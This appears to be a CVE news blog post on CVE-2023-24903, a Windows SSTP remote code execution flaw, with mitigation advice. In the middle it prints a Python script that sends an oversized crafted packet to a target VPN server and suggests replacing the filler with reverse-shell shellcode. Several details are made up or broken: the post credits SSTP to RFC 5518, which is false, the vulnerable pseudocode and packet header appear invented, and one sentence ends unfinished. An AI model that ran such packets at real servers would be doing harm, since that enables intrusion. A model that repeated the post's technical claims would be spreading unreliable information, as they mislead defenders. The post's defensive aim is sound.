CVE CyberSecurity Database News

CVE-2023-24903 - Exploiting Windows SSTP Remote Code Execution Vulnerability

Poster -

In May 2023, Microsoft patched a serious vulnerability identified as CVE-2023-24903. This flaw exists in the Windows implementation of Secure Socket Tunneling Protocol (SSTP), which is widely used for VPN connections. It allowed remote attackers to execute arbitrary code on affected systems—potentially taking full control. Here’s an exclusive deep dive into what this vulnerability is, how attackers could exploit it, and how you can protect your systems.

What is SSTP and Why Does This Matter?

SSTP is a Microsoft VPN protocol that encrypts traffic between clients and servers. It operates over HTTPS and is typically enabled for Windows VPN servers. If your network uses Windows VPN with SSTP, this vulnerability directly impacts you.

Attack Vector: Network (Remote, no authentication required)

- Affected Systems: Windows Server 2008 and up, Windows 10/11, especially where Routing and Remote Access Service (RRAS) is enabled.

How Attackers Could Exploit CVE-2023-24903

The core issue is how the SSTP service processes certain network packets. Specially crafted or malicious SSTP packets can cause a heap buffer overflow. If an attacker sends these packets to a vulnerable server, they could run code with SYSTEM-level privileges. This could mean:

Attack Prerequisites

- The attacker must be able to send SSTP packets to the server. (Public VPN servers are especially at risk.)
- No authentication needed: The vulnerability exists before login, during connection establishment.

Vulnerable Code Flow (Simplified Pseudocode)

// Simplified pseudocode to demonstrate the issue
void sstp_receive_packet(char *packet, size_t length) {
    char buffer[1024];
    // Missing bounds check!
    memcpy(buffer, packet, length);
    // ...process buffer
}


In the above, the code copies attacker-controlled data into a static-size buffer, without checking if length exceeds the buffer. That means if you send a packet longer than 1024 bytes, you overwrite adjacent memory.

Dangerous Packet Structure

RFC 5518 defines SSTP packet formats, but Microsoft’s internal implementation missed a proper validation. The crafted exploit packet might look like this in Python:

import socket

# Replace with target's IP and port
host = "TARGET_IP"
port = 443    # Default for SSTP over HTTPS

payload = b'\x13\x88'  # SSTP Data packet header
payload += b'A' * 2048 # Overflows the vulnerable buffer

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host, port))
s.sendall(payload)

In a real-world attack, the payload following the header wouldn’t just be As, but stage- shellcode to perform the desired action (like opening a reverse shell).

Note: This code is for educational purposes only. Don't attack systems you don't own or have permission to test.

How To Fix

- PATCH IMMEDIATELY: Microsoft’s update closes the vulnerability. See Microsoft Advisory.
- Segment Networks: Restrict VPN access via firewall rules and don’t expose RRAS directly to the internet if not necessary.
- Monitor Logs: Watch for anomalous SSTP connection attempts, especially failed connections with unusually large packets.

Official Microsoft Advisory:

CVE-2023-24903 | Windows Secure Socket Tunneling Protocol (SSTP) Remote Code Execution Vulnerability

NIST National Vulnerability Database:

NVD Entry for CVE-2023-24903

Patch Release Details:

Microsoft Security Update Guide May 2023

SSTP RFC:

RFC 5518 – Microsoft Secure Socket Tunneling Protocol (SSTP)

What Should You Do Next?

If you run Windows servers with VPN or RRAS enabled, patch immediately and audit your exposure. Even though there’s no public exploit (yet), the details are out—and it’s only a matter of time before this gets weaponized.

Stay safe, and always monitor your externally facing services.


For security researchers:  
Tools like Wireshark can help capture SSTP traffic. Look for suspiciously large SSTP connection packets, especially during pre-authentication stages.


*This post is for educational awareness and to help defenders close dangerous gaps, not for malicious use!*

Timeline

Published on: 05/09/2023 18:15:00 UTC
Last modified on: 05/15/2023 18:39:00 UTC